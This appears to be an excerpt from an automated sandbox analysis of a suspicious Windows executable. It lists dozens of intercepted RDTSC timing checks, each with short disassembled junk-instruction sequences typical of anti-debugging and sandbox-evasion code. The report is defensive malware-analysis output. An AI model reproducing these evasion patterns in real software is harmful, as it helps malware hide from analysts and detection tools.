                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DE8D second address: 114DEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC77h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F43F0D0DC6Ch 0x00000013 jnp 00007F43F0D0DC66h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DEB8 second address: 114DECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43F0D10391h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE0D second address: 114EE11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE11 second address: 114EE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE1B second address: 114EE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE1F second address: 114EE4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D1038Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F43F0D10396h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FEF8 second address: 114FEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FEFD second address: 114FF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FF03 second address: 114FF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150121 second address: 1150127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1150127 second address: 115012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11585E5 second address: 11585EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11585EE second address: 1158604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F43F0D0DC66h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115876A second address: 1158775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43F0D10386h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1158775 second address: 11587A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43F0D0DC71h 0x00000009 jmp 00007F43F0D0DC78h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11587A2 second address: 11587AC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43F0D10386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11588FF second address: 1158918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F43F0D0DC6Ch 0x0000000b jbe 00007F43F0D0DC66h 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F43F0D0DC66h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11634DC second address: 11634E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162A97 second address: 1162AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F43F0D0DC66h 0x0000000a jmp 00007F43F0D0DC72h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162AB3 second address: 1162AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F43F0D10396h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1162D86 second address: 1162DA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c jnp 00007F43F0D0DC72h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116307A second address: 1163086 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43F0D10386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1163086 second address: 11630B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Fh 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 jmp 00007F43F0D0DC6Bh 0x00000019 js 00007F43F0D0DC6Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11630B7 second address: 11630C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F43F0D10386h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11661F3 second address: 1166225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC6Fh 0x00000007 push ebx 0x00000008 jmp 00007F43F0D0DC6Dh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F43F0D0DC8Ah 0x00000018 jng 00007F43F0D0DC6Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F867D second address: 10F8696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D10394h 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F8696 second address: 10F86B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F86B1 second address: 10F86E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F43F0D10398h 0x0000000a jmp 00007F43F0D10398h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD4E2 second address: 10FD4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116AC02 second address: 116AC2E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43F0D10386h 0x00000008 jne 00007F43F0D10386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F43F0D10393h 0x00000016 jc 00007F43F0D10386h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116AC2E second address: 116AC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jg 00007F43F0D0DC66h 0x0000000c jng 00007F43F0D0DC66h 0x00000012 pop eax 0x00000013 popad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116AC49 second address: 116AC67 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F43F0D1038Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F43F0D1038Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116B0B3 second address: 116B0C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F43F0D0DC66h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A668 second address: 111A66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A66E second address: 111A67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F43F0D0DC66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A67D second address: 111A683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A683 second address: 111A6CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D0DC77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F43F0D0DC6Ch 0x0000000f jl 00007F43F0D0DC66h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F43F0D0DC79h 0x0000001c jo 00007F43F0D0DC6Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111A6CD second address: 111A6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BEAC second address: 116BEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F43F0D0DC7Ah 0x0000000e popad 0x0000000f jl 00007F43F0D0DC7Eh 0x00000015 jmp 00007F43F0D0DC6Ah 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BEE2 second address: 116BEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FA83 second address: 116FA88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FA88 second address: 116FA8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116FA8D second address: 116FA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F43F0D0DC6Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175117 second address: 1175148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F43F0D103A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F43F0D10386h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175148 second address: 117514C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117514C second address: 117518E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F43F0D10399h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F43F0D1038Ch 0x00000017 popad 0x00000018 jmp 00007F43F0D1038Ch 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117518E second address: 1175194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11752F1 second address: 11752FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11752FA second address: 1175316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F43F0D0DC66h 0x0000000a popad 0x0000000b push eax 0x0000000c je 00007F43F0D0DC66h 0x00000012 pop eax 0x00000013 pushad 0x00000014 jl 00007F43F0D0DC66h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1174E35 second address: 1174E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1175B40 second address: 1175B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F43F0D0DC66h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11760C5 second address: 11760D5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43F0D10386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11760D5 second address: 11760D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11760D9 second address: 11760F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F43F0D1038Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnp 00007F43F0D10386h 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11760F4 second address: 1176111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F43F0D0DC77h 0x00000010 jmp 00007F43F0D0DC6Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176111 second address: 1176115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1176115 second address: 117611E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117611E second address: 1176124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117BC8B second address: 117BC95 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43F0D0DC66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E928 second address: 113E92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F00F second address: 113F013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113FA46 second address: 111A668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D10393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F43F0D10394h 0x00000010 nop 0x00000011 jnc 00007F43F0D10390h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a sub dword ptr [ebp+122D30B1h], esi 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp+12480562h] 0x00000027 cld 0x00000028 push eax 0x00000029 jmp 00007F43F0D10393h 0x0000002e mov dword ptr [esp], eax 0x00000031 mov dx, 50C3h 0x00000035 mov edx, dword ptr [ebp+122D3810h] 0x0000003b lea eax, dword ptr [ebp+1248051Eh] 0x00000041 sub dword ptr [ebp+122D2E97h], edx 0x00000047 push eax 0x00000048 jmp 00007F43F0D1038Bh 0x0000004d mov dword ptr [esp], eax 0x00000050 jp 00007F43F0D1038Ch 0x00000056 call dword ptr [ebp+122D1B1Eh] 0x0000005c pushad 0x0000005d pushad 0x0000005e pushad 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B05C second address: 117B067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F43F0D0DC66h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B067 second address: 117B0A9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43F0D1038Ch 0x00000008 jnp 00007F43F0D103ADh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B0A9 second address: 117B0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC77h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B0C4 second address: 117B0CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B3E4 second address: 117B3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B3EA second address: 117B3F6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F43F0D10386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1E87 second address: 10F1E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117DDC5 second address: 117DDEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43F0D10391h 0x00000007 js 00007F43F0D10386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 push edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117DDEA second address: 117DE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F43F0D0DC66h 0x0000000c jmp 00007F43F0D0DC73h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117DE0E second address: 117DE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117DE14 second address: 117DE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E2F second address: 1180E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E3C second address: 1180E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E42 second address: 1180E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E49 second address: 1180E56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jne 00007F43F0D0DC66h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E56 second address: 1180E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E5C second address: 1180E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180E65 second address: 1180E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180FE3 second address: 1180FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D0DC70h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184A78 second address: 1184A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184A7E second address: 1184A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6C98 second address: 10F6CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F43F0D10394h 0x0000000b popad 0x0000000c jmp 00007F43F0D1038Ah 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118AB71 second address: 118AB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118AB77 second address: 118ABA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43F0D10394h 0x00000009 jmp 00007F43F0D10398h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118ABA8 second address: 118ABCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43F0D0DC78h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b jc 00007F43F0D0DC6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F461 second address: 113F466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F466 second address: 113F48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F43F0D0DC7Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113F48E second address: 113F4A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43F0D10392h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
